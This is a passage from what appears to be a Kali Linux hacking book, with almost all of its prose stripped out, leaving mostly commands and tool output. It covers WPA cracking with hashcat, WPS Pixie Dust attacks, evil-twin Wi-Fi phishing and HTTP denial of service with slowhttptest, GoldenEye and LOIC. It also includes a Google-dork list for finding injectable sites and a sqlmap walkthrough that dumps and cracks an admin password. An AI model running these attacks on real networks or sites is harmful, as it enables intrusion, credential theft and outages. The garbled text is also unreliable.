-a = 3 ( ).
capture.hccap = .cap.
wpaclean aircrack-ng.
?d?d?d?d?d?d?d?d = , d = . ,
, , 78964352 12345678 ..
, .
, .
, . ,
webware-1.hcmask. .
/usr/share/oclhashcat/masks/webware-1.hcmask.
, , oclHashcat :
1 ls /usr/share/oclhashcat/masks/
,
:
1 cudahashcat -m 2500 -a 3 /root/hs/out.hccap /usr/share/oclhashcat/masks/webware-1.hcmask
.hcmask file
.hcmask :
1 tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask
Hashcat (cudaHashcat
oclHashcat) .

Hashcat (cudaHashcat oclHashcat) .
, Hashcat.
, . . /root.
1 cat hashcat.pot

. ,
hashcat.net, .
.
, : ,
, , , ,
.
( ),
WebWare.biz. , !

Wifite Pixiewps

Pixiewps. :
1. pixie dust attack
2. Pixiewps Wiire
3. Pixiewps Reaver (t6x)
96

4. Reaver (t6x) Pixiewps Pixiewps


Kali Linux
5. Wifite Pixiewps
, Pixiewps,
.
, Wifite Pixiewps
Kali Linux. ,
. .
https://github.com/aanarchyy/wifite-mod-pixiewps
, (wifite-ng),
. (,
Kali Linux SSH, ,
. .
, :
1 wget --output-document=/usr/bin/wifite-ng https://raw.githubusercontent.com/aanarchyy/wifite-mo
:
1 chmod +x /usr/bin/wifite-ng
!
:
1 wifite-ng

1 -pto <sec> # pixiewps, 660
2 -ponly # pixiewps M3
3 -pnopsk # reaver
4 -paddto <sec> # n , 30
5 -update # wifite
6 -endless # ,

Kali Linux. Kali .
Pixiewps Wiire

reaver-wps-fork-t6x t6x

pixiewps, reaver,
.
.

.
( ).
(, , ,
. .).
,
pixiewps reaver
github
mdk3
.
97

Wi-Fi : , Kali Linux

Kali Linux , ,
. Kali
,
.
, ,
. ,
.
. (Wi-Fi).
,
.
,
. .
, . . .
Kali?,
: .
:
;
;
;
() ;
98

/ / ,
.
( ) ,
,
. ,
. , ,
.
,
. .
1 cd ~
2 mkdir opt
wifiphisher
: https://github.com/sophron/wifiphisher
Wifiphisher WiFi
.
. .. .
WPA/WPA2.
Wifiphisher Kali Linux MIT .
, :
1. . Wifiphisher
wifi
(deauth)
, .
2. . Wifiphisher
. ,
. NAT/DHCP
. , -
. --.
3.
. wifiphisher - HTTP & HTTPS
. , wifiphisher
, , , ,
, WPA .
wifiphisher
, .
hostapd, , , :
1 apt-get install hostapd
wifiphisher
1 cd ~/opt
2 git clone https://github.com/sophron/wifiphisher
3 cd wifiphisher/
:
1 python wifiphisher.py
99

wifiphisher?
100

,
,
waidps. .
waidps
: https://github.com/SYWorks/waidps
waidps , .

.
.
. .
, waidps
. .
WAIDPS , Python
Linux. , Kali,
/ . .. Kali Linux
.
, ( ) ,
( WEP/WPA/WPS)
( ). , WiFi
.
: MAC SSID
.
WAIDS , ,
,
. .
, , .
WAIDS (
, WIDS):
Association / Authentication flooding
,
WPA
WEP ARP

WEP chopchop
WPS Reaver, Bully ..
- (Evil-Twin)

waidps
1 cd ~/opt
2 git clone https://github.com/SYWorks/waidps
3 cd waidps
4 python waidps.py
:
101

Chopchop:

Chopchop :

Chopchop :
102

3vilTwinAttacker
: https://github.com/P0cL4bs/3vilTwinAttacker
Wi-Fi,
, .
:
Kali linux.
Ettercap.
Sslstrip.
Airbase-ng aircrack-ng.
DHCP.
Nmap.
3vilTwinAttacker
1 cd ~/opt
2 git clone https://github.com/P0cL4bs/3vilTwinAttacker
3 cd 3vilTwinAttacker
4 chmod +x install.sh ./install --install

1 python 3vilTwin-Attacker.py
[ DHCP Debian ]
Ubuntu
1 $ sudo apt-get install isc-dhcp-server
Kali linux
1 apt-get install isc-dhcp-server
[ DHCP redhat ]
Fedora
1 $ sudo yum install dhcp
103

linset
: https://github.com/vk496/linset
linset " " (Evil Twin Attack).
linset
104

.
Kali Linux ( ).
. :
1 apt-get install isc-dhcp-server lighttpd macchanger php5-cgi macchanger-gtk

. linset , ,
.
:
1 cd ~/opt
2 git clone https://github.com/vk496/linset
3 cd linset
4 chmod +x linset ./linset
linset


( )
-
,
DHCP
DNS
-
,
, , -

,

Router Scan by StasM Kali Linux ( Wi-Fi )

, Router Scan Stas'M !


.
:
, , -
(, .)


, ,
. , , -, Wi-Fi,
. .
, , ,
. .
, Linux.
.

,
- Linux. , . .
. : nmap ( ) +
curl ( ) + grep (
( )
/ ).
,
1000 Wi-Fi. : PHP,
105

,
. ..
.
, .
, , ,
. ,
. , , ( nmap,
PHP) ,
. ,
Stas'M, curl.
106
107

Router Scan Stas'M. !


, Wi-Fi
.
Windows, , ,
.
Linux Router Scan Stas'M
Wine. Kali Linux.
Wine Kali Linux
Wine Kali Linux, ,
. , , -
, .
:
1 dpkg --add-architecture i386
2 apt-get update
3 apt-get install wine-bin:i386
Router Scan Stas'M, ( ),
RouterScan.exe, Wine,
Windows.
Router Scan Stas'M Linux (
):

:
108

- :
Wi-Fi -
;
Wi-Fi ( ),
IP , , IP - .
,
IP, IP .
, , , :

mvd.ru
109

4. -

- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow body slow


read

- ,
, () .
, mod_evasive
DoS .
-:
- Apache mod_security mod_evasive CentOS
DoS:
- Low Orbit Ion Cannon (LOIC)
- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow body slow
read ( )
SlowHTTPTest ,
(DoS) .
Linux, OSX Cygwin (Unix-
Microsoft Windows).
DoS
, Slowloris, slow body, Slow Read (
TCP), , Apache
Range Header,
.
Slowloris Slow HTTP POST DoS , HTTP, ,
, .
HTTP ,
, .
, .
HTTP, HTTP .
Slow Read , slowloris slow body,
, HTTP , .
SlowHTTPTest
Kali Linux
Kali Linux apt-get .. ( !)
1 apt-get install slowhttptest
110

Linux
, . .
, , , .
: SlowHTTPTest,
:

(t=`curl -s https://code.google.com/p/slowhttptest/downloads/list | grep -E -o


'//slowhttptest.googlecode.com/files/slowhttptest(.)*.tar.gz" onclick="' | sed 's/\/\///' | sed 's/" onclick="//'
| head -1`; curl -s $t -o slowhttptest-last.tar.gz) && tar -xzvf slowhttptest-last.tar.gz && cd slowhttptest-
*

.. , .
, , .
1 $ tar -xzvf slowhttptest-x.x.tar.gz
2 $ cd slowhttptest-x.x
3 $ ./configure --prefix=PREFIX
4 $ make
5 $ sudo make install
PREFIX , slowhttptest
.
libssl-dev .
.
Mac OS X
Homebrew:
1 brew update && brew install slowhttptest
Linux
, slowhttptest (
Kali Linux).
SlowHTTPTest
111

slowhttptest , .
.
slow body a.k.a R-U-Dead-Yet,

slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php -x 10
-p 3
,
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u
http://192.168.1.37/info.php -x 10 -p 3
Test results against
http://192.168.1.37/info.phpClosedPendingConnectedServiceavailable03691215182124273002004006
00800SecondsConnections
, ,
. , . ,
,
.

slow headers a.k.a. Slowloris


slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u http://192.168.1.37/info.php -x 24 -p 3
,
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://192.168.1.37/info.php
-x 24 -p 3
: :
112
113

Slow Read .
x.x.x.x:8080 , - IP
:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://192.168.1.37/info.php -p 5 -l 350
-e x.x.x.x:8080
:
114
115

SlowHTTPTest
,
5 , (
1), ( 4).
-g CSV, HTML,
Google Chart.

,
.
CSV
, MS Excel, iWork Numbers Google Docs.
, , ,
:
Hit test time limit , -l
No open connections left
Cannot establish connection N ,
N -i, 10 ( ).
.
Connection refused (
? )
Cancelled by user Ctrl-C SIGINT -
Unexpected error .
SlowHTTPTest
, .
,
. .

116

, http://192.168.1.37 1000 .
1 slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168

-
1 root@WebWare-Debian:~# netstat | grep http | wc -l
2 111

, . . SSH
. http 111 10 .
(
VPS).
DoS
DoS , , ,

( ),
DoS , , SlowHTTPTest
.
117

, ,
- ,
. , DoS IP
() . .
,
-.

Windows, Linux Mac. DoS
, GoldenEye, hping3 -,
. DoS (,
- ). , ,
-, .
WebWare.biz!

- : DoS - Kali Linux GoldenEye

WebWare.biz DoS,
HTTP, - .
GoldenEye , , 30
, , . ,
WAF, IDS.
- .
iptables/
.
GoldenEye:
: GoldenEye
: Jan Seidl
-: http://wroot.org/
GoldenEye:
1.
.
2. GoldenEye
!
3. GoldenEye HTTP DoS.
4. : HTTP Keep Alive + NoCache
DoS DDoS
DoS . DDoS.
DoS DDoS :
1. DoS DDoS
2. DoS DDoS
3. DoS DDoS
DoS DDoS
DoS DDoS , Windows, Apache,
OpenBSD .
DoS DDoS
DoS DDoS .
Synflood, Ping of Death .
DoS DDoS
ICMP-, UDP- ,
.
118

DoS DDoS . ,
DoS . ( )
DDoS . , , , . .
/.
GoldenEye
, , ~/opt.
, :
1 mkdir opt
2 cd opt
, GoldenEye,
GoldenEye ( ):
1 mkdir GoldenEye && cd GoldenEye && wget https://github.com/jseidl/GoldenEye/archive/master
, .
GoldenEye, :
root@WebWare-Kali:~/opt# mkdir GoldenEye
root@WebWare-Kali:~/opt# cd GoldenEye
root@WebWare-Kali:~/opt/GoldenEye# wget
https://github.com/jseidl/GoldenEye/archive/master.zip

master.zip.
1 unzip master.zip
119

GoldenEye-master,
:
1 ls
2 cd GoldenEye-master/
3 ls

GoldenEye -
, :
1 ./goldeneye.py
:
120


. .
: ( )
. ,
.
.
, .
:
root@WebWare-Kali:~/opt/GoldenEye/GoldenEye-master# ./goldeneye.py
http://www.goldeneyetestsite.com/
()
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
()
python goldeneye.py http://www.goldeneyetestsite.com/
, , .
GoldenEye:
top:

.. , ,
350 .

1 ./goldeneye.py http://192.168.1.37/info.php
121


, - ,
, .

, ( -
, ).
GoldenEye
:
1 cat /var/log/apache2/access.log | grep -E '192.168.1.55'
grep -E '192.168.1.55', ,
.
:
1
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?vySSDx=tG1rmfX4HbYXBm&CKV
2
Safari/535.17"
3
192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET /info.php?dC1FyXpw=hB6Oh&rjcf74A=YV
4
AppleWebKit/536.12 (KHTML, like Gecko) Chrome/10.0.623.89 Safari/536.26"
5
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?0Nk7p=kSf&1eVF8PNy=UpDtxpDmJ
6
Firefox/12.0"
7
192.168.1.55 - - [18/Jun/2015:17:06:51
8
"http://www.google.com/gCqMk2Q05?DxQe=67gW4HUd3iTKCu2qWSJ&ngWHMmS1=5XyoGh6q2
9
(Linux x86_64; X11) Gecko/20010905 Firefox/17.0"
10
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?jA5Kw=fwtSMfaPQ8XtCaK&Y0fBbD
11
122

12192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?t2U0aYjxm=q21n4BARB1&qxI1=cT


13Chrome/18.0.1844.44 Safari/537.21"
14192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?nkIkop=6pivICjNb6&U3Y=dDlbGnW
15OS X 11_6_2)"
16192.168.1.55 - - [18/Jun/2015:17:06:48 +0700]
17"http://www.baidu.com/fWaBwllK?aNP85MesWv=VhL6v32qtwyj&6CLwEBed=Eb73YTA24oYXmL
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_4_1) AppleWebKit/536.10 (KHTML, like Gecko) Chrom
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?so64O=2GhoHQaFy&DSmxwEW
"Mozilla/5.0 (Windows; U; MSIE 10.0; Windows NT 5.1; .NET CLR 2.2.16303; Win64; x64)"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?EXRbe03wp=fEBV5exjikcr8oNbEkmN
.NET CLR 1.0.1395; X11)"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?7xIRdP0=8mjyacN&kEd2MwYtJ=bW
10_5_0) Gecko/20062612 Firefox/18.0"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?lVn80y605=IDRbDmoiDyNBu HTTP/
192.168.1.55 - - [18/Jun/2015:17:06:52 +0700] "GET /info.php?mAthtfI=c4QdAopYyQGAsJAl0XUH
Safari/537.21"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?1nwS7r=g6qpYcfOre HTTP/1.1" 200 6
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?00iHfl2=CGhueehx3DqR32D&MnPMI
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?Ml1k=DFVW0F7 HTTP/1.1" 200 6950
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?khUn=xnRp0gXjlF&bl8TpeXEF
AppleWebKit/537.3 (KHTML, like Gecko) Version/5.1.2 Safari/536.32"

, GET ,
, Bing, Baidu, Yandex
.
, - ?
, URL, Referrer
200 OK. ? .
, ,
, IP ( IP
?) (Firefox, Chrome, MSIE, Safari . .),
(Mac, Linux, Windows ..) . ,
URL , -
,
123

(, Apache worker/socket). - X
IP /
,
(HTTP 503 ). ,
proxy/VPN .
IP :
root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/ -
w 10 -s 10 -m random
:
-w = 10
-s = 10
-m = , GET POST
DoS!
Google Analytics GoldenEye
, , -
. , Google Analytics
( IP,
Google , ).
:
Google, . .
.
Google , -
Google.
.
/ GoldenEye
, Apache:
1. IP ( 300 IP Apache)
2. IP
3. KeepAlive Connection Timeout ( 300)
4. , .
, .
5. Web application Firewall (WAF).
6.
.
7. NGINX Node.js .

GoldenEye ( ) HTTP Flooder .
, NoCache KeepAlive GoldenEye .
,
, .
, -
( ), - -
, GET POST .
. WAF .

. . .

- Low Orbit Ion Cannon (LOIC)


124

Low Orbit Ion Cannon (LOIC)


Low Orbit Ion Cannon (LOIC) - , ,
, .
.
, ,
- .
Anonymous, DDoS
-,
. , , ,
- ; ,
LOIC
.
Low Orbit Ion Cannon (LOIC) Windows
Windows .
. !

Low Orbit Ion Cannon (LOIC) Linux


LOIC Linux, , ,
Kali Linux.
LOIC :
1 apt-get update
2
3 aptitude install git-core monodevelop
4
5 apt-get install mono-gmcs
125

, , Kali Linux, .
Ubuntu, Linux Mint ( Debian), :
1 sudo apt-get install mono-complete
, ,
1 cd ./Desktop
loic, :
1 mkdir loic

,
1 cd ./loic
:
1 wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh
126

:
1 chmod 777 loic.sh
:
1 ./loic.sh install
- ,
loic. , :
1 ./loic.sh update
, LOIC. :
1 ./loic.sh run
127

, , Windows ( )?
Linux !
- Low Orbit Ion Cannon (LOIC)
LOIC . IRC .
. URL IP .
. Lock on. : TCP, UDP HTTP. HTTP.
. , IMMA
CHARGIN MAH LAZER. LOIC . Stop Flooding
:
128

.. , Windows
Linux. , IRC ,
.
.
129

5. -

SQLMAP Kali Linux: - SQL-


Windows, "
sqlmap Windows". ,
" : SQL-".
, , Kali Linux,
, ? ,
- . , , ,
. ()
,
-. ,
PHP, , !
-
.
SQLMAP,
SQL-.
, , , ,
.
SQL- , ,
, ( ) SQL
(, ).
SQL- , ,
,
SQL ,
. SQL-
-, SQL .
SQLMAP SQL-
Kali Linux , , - ( , )
Kali Linux.
: Kali Linux,
Kali Linux:
.
, WebWare.biz Kali Linux.
SQLMAP
sqlmap ,
SQL-
. ,


,
.

MySQL, Oracle, PostgreSQL,
Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase SAP MaxDB.
SQL-: ,
, , UNION ,
.
130

SQL-
, IP , .
, , , , ,
.

.
, , ,
.

.
,
. , ,
, ,
name pass ( ).
()
, MySQL, PostgreSQL
Microsoft SQL Server.

, ,
MySQL, PostgreSQL Microsoft SQL Server.
(out-of-band) TCP
.
, Meterpreter
(VNC) .
Metasploit
Meterpreter.
, ,
- , , .
- , . ,
.
, :
1: -
, , , .
, Google Dorks , . ,
, , .
- , , .
1.: Google Dorks SQLMAP SQL -
. .
, .
, .
Google Dork string Column Google Dork string Google Dork string
1 Column 2 Column 3
inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=
inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=
inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=
inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=
inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=
inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=
inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=
131

inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=


inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=
inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=
inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=
inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=
inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=
inurl:news.php?id= inurl:newsticker_info.php?idn= inurl:collectionitem.php?id=
inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=
inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=
inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=
inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=
inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=
inurl:declaration_more.php?decl_i
inurl:news_view.php?id= inurl:pop.php?id=
d=
inurl:pageid= inurl:select_biblio.php?id= inurl:shopping.php?id=
inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=
inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=
inurl:newsDetail.php?id= inurl:ogl_inet.php?ogl_id= inurl:viewshowdetail.php?id=
inurl:gallery.php?id= inurl:fiche_spectacle.php?id= inurl:clubpage.php?id=
inurl:communique_detail.php?i
inurl:article.php?id= inurl:memberInfo.php?id=
d=
inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=
inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=
inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=
inurl:readnews.php?id= inurl:index.php?id= inurl:shredder-categories.php?id=
inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?I
inurl:historialeer.php?num= inurl:show_an.php?id=
D=
inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=
inurl:Stray-Questions-
inurl:loadpsb.php?id= inurl:transcript.php?id=
View.php?num=
inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=
inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=
inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=
inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=
inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=
inurl:news.php?id= inurl:participant.php?id=
inurl:avd_start.php?avd= inurl:download.php?id=
inurl:event.php?id= inurl:main.php?id=
inurl:product-item.php?id= inurl:review.php?id=
inurl:sql.php?id= inurl:chappies.php?id=
inurl:material.php?id= inurl:read.php?id=
inurl:clanek.php4?id= inurl:prod_detail.php?id=
inurl:announce.php?id= inurl:viewphoto.php?id=
inurl:chappies.php?id= inurl:article.php?id=
inurl:read.php?id= inurl:person.php?id=
inurl:viewapp.php?id= inurl:productinfo.php?id=
inurl:viewphoto.php?id= inurl:showimg.php?id=
inurl:rub.php?idr= inurl:view.php?id=
132

inurl:galeri_info.php?l= inurl:website.php?id=
1.: , - SQLMAP
SQL-
, , .
, SQLMAP SQL-.
, , ,
.
, inurl:rubrika.php?idr=, -
:
1 http://www.sqldummywebsite.name/rubrika.php?id=28
' URL. ( "
, ' ).
:
1 http://www.sqldummywebsite.name/rubrika.php?id=28'
SQL , SQLMAP SQL-.
,
.
.

SQLi
Microsoft SQL Server
1 Server Error in / Application. Unclosed quotation mark before the character string attack;
2 Description: An unhanded exception occurred during the execution of the current web request. Plea
3 Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the chara
MySQL
1 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/ww
2 Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL se
Oracle
1 java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.D
2 Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated
PostgreSQL Errors
1 Query failed: ERROR: unterminated quoted string at or near
2: SQLMAP SQL-
, -
SQLMAP SQL-.
( ). SQLMAP,
, .
133

-.
1 sqlmap -u http://www.sqldummywebsite.name/rubrika.php?id=31 --dbs
:
sqlmap = sqlmap
-u = (. http://www.sqldummywebsite.name/rubrika.php?id=31)
dbs =

:
1 web server operating system: Linux Gentoo
2 web application technology: Nginx, PHP 5.3.29
3 back-end DBMS: MySQL 5.0.11
4 [18:47:01] [INFO] resumed: information_schema
5 [18:47:01] [INFO] resumed: laminat
, , ,
information_schema MYSQL.
, laminat.
3. , SQLMAP SQL-

- .
:
1 sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat --tables
, 18 .
1 [18:52:25] [INFO] fetching tables for database: 'laminat'
2 [18:52:25] [INFO] fetching number of tables for database 'laminat'
134

3 [18:52:25] [INFO] resumed: 18


4 [18:52:25] [INFO] resumed: admin
5 [18:52:25] [INFO] resumed: browser
6 [18:52:25] [INFO] resumed: diskuse
7 [18:52:25] [INFO] resumed: diskuse_obor
8 [18:52:25] [INFO] resumed: diskuse_tema
9 [18:52:25] [INFO] resumed: historie
10 [18:52:25] [INFO] resumed: mag_admvolby
11 [18:52:25] [INFO] resumed: mag_anketa
12 [18:52:25] [INFO] resumed: mag_autori
13 [18:52:25] [INFO] resuming partial value: mag_cla
14 [18:52:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threa
15 [18:52:25] [INFO] retrieved: ori
16 [18:54:23] [INFO] retrieved: mag_claori...
17 ............

, admin, SQLMAP SQL-


, , , .
4:
SQLMAP SQL-
admin
-, SQLMAP SQL-. SQLMAP SQL-
, :
1 sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --columns
1 [19:57:42] [INFO] fetching columns for table 'admin' in database 'laminat'
2 [19:57:42] [INFO] resumed: 5
3 [19:57:42] [INFO] resumed: id
4 [19:57:42] [INFO] resumed: int(2)
5 [19:57:42] [INFO] resumed: login
135

6 [19:57:42] [INFO] resumed: v


7 [19:57:42] [INFO] resumed: heslo
8 [19:57:42] [INFO] resumed: varchar(32)
9 [19:57:42] [INFO] resumed: jmeno
10 [19:57:42] [INFO] resumed: varchar(20)
11 [19:57:42] [INFO] resumed: stupen
12 [19:57:42] [INFO] resumed: int(1)
13 Database: laminat
14 Table: admin
15 [5 columns]
16 +--------+-------------+
17 | Column | Type |
18 +--------+-------------+
19 | heslo | varchar(32) |
20 | id | int(2) |
21 | jmeno | varchar(20) |
22 | login | v |
23 | stupen | int(1) |
24 +--------+-------------+
136

! , . ,
:
heslo
stupen
login .
.. .
5: SQLMAP SQL-

SQLMAP SQL- ! :
1 sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --dump

. , , ,
, , :
1 sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C login --dump
.
, .
.
6: SQLMAP SQL-

, . , .
1 sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C heslo --dump
!! .
, . - . -,
- .
. . ,
.
, - , sqlmap .
137

, , do you want to store hashes to a temporary file for eventual further


processing with other tools, . . ,
. .
do you want to crack them via a dictionary-based attack?,
, , . ,
, , .
:
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) (
Enter)
[2] custom dictionary file ( )
[3] file with list of dictionary files ( )
Enter.
, , do you want to use common password suffixes? (slow!).
, . ,
. .
. .
1 do you want to store hashes to a temporary file for eventual further processing with other tools [y/
2 do you want to crack them via a dictionary-based attack? [Y/n/q] y
3 [20:00:41] [INFO] using hash method 'md5_generic_passwd'
4 [20:00:41] [INFO] resuming password 'nuvolari' for hash '493ccdcab464cff215467d4c62a7f142'
5 what dictionary do you want to use?
6 [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
7 [2] custom dictionary file
8 [3] file with list of dictionary files
9 >1
10 [20:00:45] [INFO] using default dictionary
11 do you want to use common password suffixes? (slow!) [y/N] n
12 [20:00:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)
13 [20:01:05] [INFO] postprocessing table dump
14 Database: laminat
15 Table: admin
16 [2 entries]
17 +----+---------------+---------------------------------------------+-------+--------+
18 | id | jmeno | heslo | login | stupen |
19 +----+---------------+---------------------------------------------+-------+--------+
20 | 1 | M?la | 493ccdcab464cff215467d4c62a7f142 (nuvolari) | fucek | 1 |
21 | 4 | Administr?tor | d41d8cd98f00b204e9800998ecf8427e | admin | 1 |
22 +----+---------------+---------------------------------------------+-------+--------+
, !
.
. .
.
, ,
.
, ,
, , . .
,
.
, ,
MD5, phpBB, MySQL SHA1 Hashcat Kali. .

-.
138


. -,
.
, ,
-.
.. , - ,
. , , , , ,
, , ,
, , !

WordPress: WPScanner Plecost

, . WebWare.biz
, ,
. . , WebWare.biz, ,
: ,
. , :
, -
.
(
, ). ,
.
Kali Linux, , ,
Kali Linux ( , ).
WordPress .
. WordPress
, ,
(!). WordPress
.
WordPress Security Scanner
WordPress. :
;
;
;
robots.txt;
WordPress, , .
, . ( ):
1 wpscan --update
( ), .
WordPress Security Scanner
update : .
url -u < url> : URL / WordPress .
force -f : WPScan , WordPress
( , WordPress, ).
enumerate -e [()] : (
).
:
u : id 1 10
u[10-20] : id 10 20 ( [] )
p :
vp : , ,
139

ap : ( )
tt : timthumbs
t :
vt : , ,
at : ( ).
, -e p,vt
. ,
"vt,tt,u,vp".
, , .
:
1 wpscan -h
:
1 wpscan -u webware.biz -e p,vt
.. wpscan, -u -
. -e ( ).
,
( ).
, WordPress,
, :
140

WordPress .
:
/proxy/admin.php, Glype;
, . . ,
wp-content/plugins/wordpress-backup-to-dropbox/. ,
, ,

. , VPS ( ,
).
Plecost
WordPress .
, ( , ).
,
, . ,
. . , .

-i, .
, . Kali Linux
//usr/share/plecost/wp_plugin_list.txt ( ).
141

plecost -i
//usr/share/plecost/wp_plugin_list.txt, . :
1 plecost -i //usr/share/plecost/wp_plugin_list.txt webware.biz
( ):

, , Metasploit Framework
searchsploit, The Exploit Database .
: WPScan Vulnerability Database ( WordPress)
Packet Storm ( ).
( WordPress)
1. WordPress (
-).
2. , ,
WordPress, (
-) , , . ..
- , , .
3. WordPress:
,
. .
WordPress. ,
, , "" . : )
, ; ) .
142

4. ( 30
, ). -
( ).
, .
5. ! Kali Linux ! ,
. , Kali Linux,
Linux. , .
,
, ,
. ..
, - , , ,
. , ( )
,
. , ,
, . ..,
, (
), ""
, , .

W3af Kali Linux


W3af (Web Application Attack and Audit Framework) open-source -
.
, - .
, .
-
XSS, CSRF Sqli w3af .
W3af
W3af :
1 w3af_console
:
1 w3af>>> help
:
1 |-----------------------------------------------------------------------------|
2 | start | . |
3 | plugins | . |
4 | exploit | . |
5 | profiles | . |
6 | cleanup | . |
7 |-----------------------------------------------------------------------------|
8 | help | . : help [] , |
9 | | "" |
10 | version | w3af. |
11 | keys | . |
12 |-----------------------------------------------------------------------------|
13 | http-settings | HTTP . |
14 | misc-settings | w3af. |
15 | target | URL. |
16 |-----------------------------------------------------------------------------|
17 | back | . |
143

18 | exit | w3af. |
19 |-----------------------------------------------------------------------------|
20 | kb | , . |
21 |-----------------------------------------------------------------------------|
w3af .
,
"back".
"view"
.
"target". URL .
:
1 w3af>>> target
2 w3af/config:target>>> help
:
1 |-----------------------------------------------------------------------------|
2 | view | . |
3 | set | . |
4 | save | . |
5 |-----------------------------------------------------------------------------|
6 | back | . |
7 | exit | w3af. |
8 |-----------------------------------------------------------------------------|
URL :
1 w3af/config:target>>> set target http://localhost
2 w3af/config:target>>> view
.
1 w3af/config:target>>> back
2 w3af>>> plugins
3 w3af/plugins>>> help
1 |---------------------------------------------------------------------------------------------------|
2 | list | List available plugins. |
3 |---------------------------------------------------------------------------------------------------|
4 | back | Go to the previous menu. |
5 | exit | Exit w3af. |
6 |---------------------------------------------------------------------------------------------------|
7 | grep | View, configure and enable grep plugins |
8 | audit | View, configure and enable audit plugins |
9 | evasion | View, configure and enable evasion plugins |
10 | crawl | View, configure and enable crawl plugins |
11 | auth | View, configure and enable auth plugins |
12 | mangle | View, configure and enable mangle plugins |
13 | output | View, configure and enable output plugins |
14 | bruteforce | View, configure and enable bruteforce plugins |
15 | infrastructure | View, configure and enable infrastructure plugins |
16 |---------------------------------------------------------------------------------------------------|
-
. Audit,crawl, infrastructure output.
audit, ,
xss, csrf, sql ldap ..
.
:
1 w3af/plugins>>> audit xss,csrf,sqli
144

:
1 w3af/plugins>>> audit all
- .
html.
crawl output.
1 w3af/plugins>>> crawl web_spider,pykto
2 w3af/plugins>>> infrastructure hmap
3 w3af/plugins>>> output console,html_file
:
Web_spider web-.
.
